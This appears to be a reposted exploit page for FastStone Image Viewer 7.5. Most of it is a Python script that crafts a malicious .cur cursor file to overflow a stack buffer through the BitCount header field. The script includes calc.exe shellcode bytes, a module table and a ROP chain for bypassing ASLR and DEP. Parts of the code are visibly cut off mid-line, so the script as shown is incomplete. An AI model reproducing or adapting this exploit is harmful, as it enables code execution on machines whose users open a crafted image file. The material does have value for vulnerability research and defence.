FastStone Image Viewer 7.5 – .cur BITMAPINFOHEADER ‘BitCount’ Stack Based Buffer Overflow (ASLR & DEP Bypass) – Digitalmunition




Exploit/Advisories spider-orange.png

Published on March 21st, 2021 📆 | 2718 Views ⚑

0

FastStone Image Viewer 7.5 – .cur BITMAPINFOHEADER ‘BitCount’ Stack Based Buffer Overflow (ASLR & DEP Bypass)

# Exploit title: FastStone Image Viewer 7.5 - .cur BITMAPINFOHEADER 'BitCount' Stack Based Buffer Overflow (ASLR & DEP Bypass)
# Exploit Author: Paolo Stagno
# Date: 15/03/2020
# Vendor Homepage: https://www.faststone.org/
# Download: https://www.faststonesoft.net/DN/FSViewerSetup75.exe
#                    https://github.com/VoidSec/Exploit-Development/tree/master/windows/x86/local/FastStone_Image_Viewer_v.7.5/
# Version: 7.5
# Tested on: Windows 10 Pro x64 v.1909 Build 18363.1256
# Category: local exploit
# Platform: windows

# Module info :
#----------------------------------------------------------------------------------------------------------------------
#Base       | Top        | Size       | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | Version, Modulename & Path
#----------------------------------------------------------------------------------------------------------------------
#0x00400000 | 0x00abf000 | 0x006bf000 | False  | False   | False |  False   | False  | 7.5.0.0 [FSViewer.exe] (C:Program Files (x86)FastStone Image ViewerFSViewer.exe)
#0x6ad80000 | 0x6adfe000 | 0x0007e000 | False  | False   | False |  False   | False  | -1.0- [fsplugin05.dll] (C:Program Files (x86)FastStone Image Viewerfsplugin05.dll)
#0x6afb0000 | 0x6b011000 | 0x00061000 | True   | True    | False |  False   | False  | -1.0- [fsplugin06.dll] (C:Program Files (x86)FastStone Image Viewerfsplugin06.dll)
#----------------------------------------------------------------------------------------------------------------------

#!/usr/bin/python
import struct, sys
print("n[>] FastStone Image Viewer v. < = 7.5 Exploit by VoidSecn")

filename="FSViewer_v.7.5_exploit.cur"

###################################################################################
# Shellcode
# MAX Shellcode size: 556
# ImageData - ROP NOP - Rop Chain - Stack Adjustment = 776 - 144 - 68 - 8 = 556
# Custom calc.exe shellcode
# size: 112
###################################################################################

shellcode=(
    "x31xdbx64x8bx7bx30x8bx7f"
    "x0cx8bx7fx1cx8bx47x08x8b"
    "x77x20x8bx3fx80x7ex0cx33"
    "x75xf2x89xc7x03x78x3cx8b"
    "x57x78x01xc2x8bx7ax20x01"
    "xc7x89xddx8bx34xafx01xc6"
    "x45x81x3ex43x72x65x61x75"
    "xf2x81x7ex08x6fx63x65x73"
    "x75xe9x8bx7ax24x01xc7x66"
    "x8bx2cx6fx8bx7ax1cx01xc7"
    "x8bx7cxafxfcx01xc7x89xd9"
    "xb1xffx53xe2xfdx68x63x61"
    "x6cx63x89xe2x52x52x53x53"
    "x53x53x53x53x52x53xffxd7"
)


if (len(shellcode)>556):
    sys.exit("Shellcode's size must be < = 556 bytes")

###################################################################################
# Cur File Format
# ---------------------------------------------------------------------------------
# | Reserved | Type  | Image Count "https://www.exploit-db.com/exploits/#" 00 00    | 02 00 | 02 00       | <- CUR file will contains two images
# Entries:
# | Width | Height | ColorCount | Reserved | XHotSpot | YHotSpot | SizeInBytes | File Offset "https://www.exploit-db.com/exploits/#" 30    | 30     | 00         | 00       | 01 00    | 02 00    | 30 03 00 00 | 26 00 00 00 | <- we'll corrupt the first image with rop chain & shellcode 
# | 20    | 20     | 00         | 00       | 02 00    | 04 00    | E8 02 00 00 | 56 03 00 00 | <- while leaving the 2nd one "untouched" a part from the stack pivot (should leave the cursor preview intact)
# 1st Image Info Header:
# | Size        | Width       | Height      | Planes | BitCount | Compression | ImageSize   | XpixelsPerM | YpixelsPerM | Colors Used | ColorsImportant "https://www.exploit-db.com/exploits/#" 28 00 00 00 | 30 00 00 00 | 60 00 00 00 | 01 00  | 89 30    | 00 00 00 00 | 00 00 00 00 | 00 00 00 00 | 00 00 00 00 | 00 00 00 00 | 00 00 00 00     |
# 1st ImageData(BLOB)
# 2nd Image Info Header:
# 2nd ImageData(BLOB)
# ---------------------------------------------------------------------------------
# BitCount will be used to read # number of bytes into a buffer triggering the buffer overflow
# its value can be modified but we need to account for two operations happening into the software.
# - SHL 1, 89 = 0x200
# - SHL 200, 2 = 0x800 (2048d) number of bytes to be read from the file
# we'll have to pad the image data to match it's size in bytes defined in the header SizeInBytes
# ImageData = SizeInBytes - ImageInfoHeader Size (330h-28h=308h 776d)
###################################################################################

image_data_pad = 776

def create_rop_nop():
    rop_gadgets = [
        0x6adc5ab6, # 0x6adc5ab6 (RVA : 0x00045ab6) : # DEC ECX # RETN    ** [fsplugin05.dll] **   |   {PAGE_EXECUTE_READ}
    ]
    return ''.join(struct.pack(' ebx
        #[---INFO:gadgets_to_set_edx:---]
        0x004798db,  # POP EDX ; RETN [FSViewer.exe] 
        0x00000040,  # 0x00000040-> edx
        #[---INFO:gadgets_to_set_ecx:---]
        0x004c7832,  # POP ECX ; RETN [FSViewer.exe] 
        0x00991445,  # &Writable location [FSViewer.exe]
        #[---INFO:gadgets_to_set_edi:---]
        0x0040c3a8,  # POP EDI ; RETN [FSViewer.exe] 
        0x0057660b,  # RETN (ROP NOP) [FSViewer.exe]
        #[---INFO:gadgets_to_set_eax:---]
        0x00404243,  # POP EAX ; RETN [FSViewer.exe] 
        0x90909090,  # nop
        #[---INFO:pushad:---]
        0x6adc21bf,  # PUSHAD # RETN [fsplugin05.dll] 
    ]
    return ''.join(struct.pack('

Source link

Tagged with:



Leave a Reply